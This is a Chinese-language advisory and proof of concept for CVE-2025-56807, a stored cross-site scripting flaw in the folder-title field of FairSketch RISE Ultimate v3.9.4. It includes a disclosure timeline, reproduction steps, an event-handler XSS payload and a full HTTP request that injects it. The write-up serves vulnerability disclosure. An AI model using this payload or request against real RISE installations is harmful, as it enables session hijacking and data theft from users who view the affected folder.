本文详细分析了FairSketch RISE Ultimate项目管理系统v3.9.4中存在的存储型跨站脚本漏洞,包含漏洞描述、时间线和完整的利用步骤,涉及HTML/JavaScript载荷注入和会话劫持风险。
CVE-2025-56807漏洞利用
漏洞描述
在FairSketch RISE Ultimate项目管理和CRM系统(v3.9.4)的文件管理器功能中发现了一个存储型跨站脚本(XSS)漏洞。该漏洞存在于创建新文件夹时提交的title参数中。由于输入清理不足,攻击者可以注入HTML/JavaScript有效载荷(例如``)。该载荷存储在文件夹名称中,并在文件管理器中列出文件夹时执行,允许在查看受影响文件夹的任何用户的浏览器中执行任意JavaScript代码。这可能导致会话劫持和数据泄露。
披露时间线
- 分配CVE ID:CVE-2025-56807
- 发现时间:2025年7月(由Aqwa Hameed发现)
- 供应商通知:通过电子邮件联系Fairsketch支持
- 响应:供应商于2025年7月22日确认
概念验证(PoC)
- 使用有效凭据登录
- 导航到文件页面
- 点击新建文件夹
- 在标题字段中输入以下载荷:
1
|
<details/open/ontoggle=prompt(origin)>
|
- 重新加载文件管理器页面以触发载荷
请求示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [已隐藏]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [已隐藏]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
|